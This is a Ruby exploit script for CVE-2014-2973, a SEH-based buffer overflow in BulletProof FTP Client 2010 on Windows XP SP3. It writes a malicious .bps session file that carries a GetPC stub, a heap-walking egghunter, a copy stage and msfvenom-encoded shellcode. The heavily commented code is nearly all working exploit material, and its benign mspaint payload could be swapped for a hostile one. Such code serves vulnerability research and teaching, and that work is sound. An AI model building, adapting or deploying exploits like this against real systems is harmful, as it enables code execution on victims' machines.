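#!/usr/bin/env ruby
# frozen_string_literal: true
#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
#
# Notes: this is a file-format (local) exploit — the victim has to load the
# generated .bps session file and click "connect".  The overflowed session
# field is too small, and too restricted in byte values, for the real payload,
# so the payload is stored in a later field of the same file (which ends up on
# the heap) and a small stack-side stub locates it with an egghunter, copies it
# back onto the stack and jumps to it.
#
# Layout of the 500-byte overflow field (all offsets are BYTES):
#   [1..2]    fldpi                       \ GetPC: eax = address of offset 1
#   [3..7]    fwait; fnstenv [esp-0xc]    |
#   [8]       pop eax                     /
#   [9..15]   mov [eax+0x44], imm32       restore bytes 69..72
#   [16..22]  mov [eax+0x58], imm32       restore bytes 89..92 (nSEH, clobbered by the jmp)
#   [23..29]  mov [eax+0x5c], imm32       restore bytes 93..96 (handler, clobbered by the P/P/R)
#   [30..119] heap finder + egghunter + copy stage (execution falls into it from the stub)
#   [89..92]  nSEH: jmp short back to offset 1
#   [93..96]  SEH handler: pop/pop/ret in msacm32.drv
#
# Encoding note: every buffer below is forced to ASCII-8BIT so String#[]= and
# String#size work on BYTES.  The original script indexed UTF-8 *characters*;
# that only worked because no byte pair before offset 104 formed a valid
# multi-byte sequence (\xc7\xb9 in the copy stage does), and it silently
# produced a 501-byte field while reporting a one-byte-short file size.

FILENAME = "xsession.bps"
SEH_OFFSET = 93      # byte offset of the SEH record inside the overflow field
FIELD_SIZE = 500     # size of the overflow field (author's fixed value)

# pop/pop/ret in msacm32.drv: per the author, the only non-SafeSEH module on
# the tested XP SP3 EN box whose address contains no NULL byte.  XP has no
# ASLR, so the address is fixed there; it is unlikely to hold on any other
# Windows build or service pack.
PPR_ADDR = 0x72d11f39

# Bytes the overflow field must not contain (author's list).  The stack-side
# stub avoids them with "mov reg, big; sub reg, big" tricks instead of small
# immediates.  The msfvenom payload was encoded against the first four only and
# does contain \xb1/\x83; it lives in a later field of the session file where
# those bytes are apparently tolerated, so the check below is applied to the
# overflow field only.
BADCHARS = "\x00\x0a\x0d\x1a\xb1\x83\xb2".b

# Egg the hunter looks for; it is written twice because the hunter compares
# two consecutive dwords (two scasd) before accepting a hit.
EGG = "w00t".b

# Second stage (226 bytes), generated with:
#   ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
HEAP_PAYLOAD = [
  "\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9",
  "\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10",
  "\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41",
  "\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1",
  "\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c",
  "\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba",
  "\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09",
  "\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83",
  "\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef",
  "\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb",
  "\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80",
  "\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f",
  "\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6",
  "\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28",
  "\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6",
  "\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20",
  "\x3b\x6b"
].join.b.freeze

# Stage 1a: find the base of the first process heap without using NULL or
# other bad bytes.  fs:[0x30] is the PEB pointer in the TEB; PEB+0x90 is
# ProcessHeaps on 32-bit XP (the author's "find 1st heap address").
HEAP_BASE_FINDER = [
  "\x50",                     # push eax            ; save GetPC value (&field[1]) for the copy stage
  "\xbb\xaf\x77\x77\x77",     # mov ebx, 0x777777af
  "\x81\xeb\x7f\x77\x77\x77", # sub ebx, 0x7777777f ; ebx = 0x30
  "\x64\x8b\x1b",             # mov ebx, fs:[ebx]   ; ebx = PEB
  "\xb9\x0f\x78\x77\x77",     # mov ecx, 0x7777780f
  "\x81\xe9\x7f\x77\x77\x77", # sub ecx, 0x7777777f ; ecx = 0x90
  "\x8b\x1c\x0b",             # mov ebx, [ebx+ecx]  ; ebx = PEB.ProcessHeaps
  "\x8b\x1b"                  # mov ebx, [ebx]      ; ebx = first heap base
].join.b.freeze

# Stage 1b: Skape-style int 0x2e egghunter.  eax=2 / int 0x2e is the XP
# syscall probe (NtAccessCheckAndAuditAlarm on XP; numbers differ on later
# Windows); al == 5 is the low byte of STATUS_ACCESS_VIOLATION, i.e. the page
# is unmapped and the search skips to the next one.  Scanning starts at the
# heap base found above.
EGGHUNTER = [
  "\x8b\xd3",                 # mov edx, ebx        ; edx = heap base
  "\xeb\x05",                 # jmp +5 -> inc edx
  "\x66\x81\xca\xff\x0f",     # or dx, 0xfff        ; (#1) end of page
  "\x42",                     # inc edx             ; (#2) next address / next page
  "\x52",                     # push edx
  "\x6a\x02",                 # push 2
  "\x58",                     # pop eax
  "\xcd\x2e",                 # int 0x2e            ; probe page containing edx
  "\x3c\x05",                 # cmp al, 5           ; access violation?
  "\x5a",                     # pop edx
  "\x74\xef",                 # je -> (#1)          ; unmapped: skip page
  "\xb8\x77\x30\x30\x74",     # mov eax, 0x74303077 ; "w00t"
  "\x8b\xfa",                 # mov edi, edx
  "\xaf",                     # scasd
  "\x75\xea",                 # jne -> (#2)
  "\xaf",                     # scasd
  "\x75\xe7"                  # jne -> (#2)         ; fall through: edi = byte after "w00tw00t"
].join.b.freeze

# Number of payload bytes the copy stage moves (0x77777861 - 0x7777777f).
COPY_LENGTH = 0x77777861 - 0x7777777f

# Stage 1c: copy the located payload back onto the stack and run it.  The
# destination is 3500 bytes below the GetPC address, i.e. deeper in the stack
# than the running stub — presumably chosen so the copy cannot overwrite the
# stub itself; confirm in a debugger before moving it.
COPY_STAGE = [
  "\x58",                     # pop eax             ; &field[1] saved by the heap finder
  "\x05\x54\xf2\xff\xff",     # add eax, -3500
  "\x89\xfe",                 # mov esi, edi        ; source = payload (just past the egg)
  "\x89\xc7",                 # mov edi, eax        ; destination on the stack
  "\xb9\x61\x78\x77\x77",     # mov ecx, 0x77777861
  "\x81\xe9\x7f\x77\x77\x77", # sub ecx, 0x7777777f ; ecx = COPY_LENGTH (0xe2)
  "\xf2\xa4",                 # repne movsb         ; f2 prefix acts as plain rep for movs
  "\xff\xe0"                  # jmp eax
].join.b.freeze

# Returns the bytes of BADCHARS that occur in +data+ (empty array when clean).
def badchars_in(data)
  data.bytes & BADCHARS.bytes
end

# Builds the 500-byte overflow field described in the header comment.
# Returns an ASCII-8BIT String of exactly FIELD_SIZE bytes.
# Raises RuntimeError if the field contains a byte listed in BADCHARS.
def build_stack_buffer
  field = ("A" * FIELD_SIZE).b
  stage1 = HEAP_BASE_FINDER + EGGHUNTER + COPY_STAGE

  # GetPC: fnstenv stores the address of the last FPU instruction (the
  # fldpi at field[1]); pop eax retrieves it.
  field[1, 2] = "\xd9\xeb".b                    # fldpi
  field[3, 5] = "\x9b\xd9\x74\x24\xf4".b        # fwait; fnstenv [esp-0xc]
  field[8, 1] = "\x58".b                        # pop eax

  # FixRet stubs: mov dword [eax+disp8], imm32.  eax+0x44/0x58/0x5c are
  # field[69]/[89]/[93]; the imm32 placeholders are patched in below.
  field[9, 7]  = "\xc7\x40\x44\x45\x45\x45\x45".b
  field[16, 7] = "\xc7\x40\x58\x45\x45\x45\x45".b
  field[23, 7] = "\xc7\x40\x5c\x45\x45\x45\x45".b

  # Stage 1 directly follows the stub, so execution falls into it.  bytesize
  # (not size) keeps the field at exactly FIELD_SIZE bytes.
  field[30, stage1.bytesize] = stage1

  # Save the stage-1 bytes that the SEH record overwrites into the stub
  # immediates so the stub restores them at run time, before stage 1 runs.
  # NOTE(review): the script itself never overwrites bytes 69..72; the author
  # does not say what clobbers them at run time — verify in a debugger before
  # changing the layout.
  field[12, 4] = field[SEH_OFFSET - 24, 4]
  field[19, 4] = field[SEH_OFFSET - 4, 4]
  field[26, 4] = field[SEH_OFFSET, 4]

  # nSEH: jmp short -0x5a lands on the fldpi at field[1]; 0x41 0x41 is padding.
  field[SEH_OFFSET - 4, 4] = "\xeb\xa6\x41\x41".b
  # SEH handler: pop/pop/ret returns into the nSEH jmp above.
  field[SEH_OFFSET, 4] = [PPR_ADDR].pack("V")

  bad = badchars_in(field)
  unless bad.empty?
    raise "overflow field contains bad byte(s): #{bad.map { |b| format('\\x%02x', b) }.join}"
  end

  field
end

# Assembles the complete .bps session file as an ASCII-8BIT String.
# The field order (header / overflow field / "anonymous" / payload field) is
# taken verbatim from the author's file.  The trailing "bpicplnkiibmfe" token
# shares a line with the payload and is not explained by the author —
# presumably part of the stored session field it sits in; kept as-is.
# Raises RuntimeError if HEAP_PAYLOAD no longer matches COPY_LENGTH (e.g. after
# regenerating it with msfvenom), since the copy stage would then move the
# wrong number of bytes.
def build_session_file
  unless HEAP_PAYLOAD.bytesize == COPY_LENGTH
    raise "copy stage moves #{COPY_LENGTH} bytes but payload is #{HEAP_PAYLOAD.bytesize}; update COPY_STAGE"
  end

  [
    "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n".b,
    build_stack_buffer,
    "\r\n".b,
    "anonymous\r\n".b,
    EGG * 2,
    HEAP_PAYLOAD,
    "bpicplnkiibmfe\r\n".b
  ].join.b
end

# Writes the session file to +filename+ and prints its byte size.
def write_exploit_file(filename = FILENAME)
  data = build_session_file
  File.binwrite(filename, data)
  puts "Exploit file: #{filename} size: #{data.bytesize}"
end

write_exploit_file if $PROGRAM_NAME == __FILE__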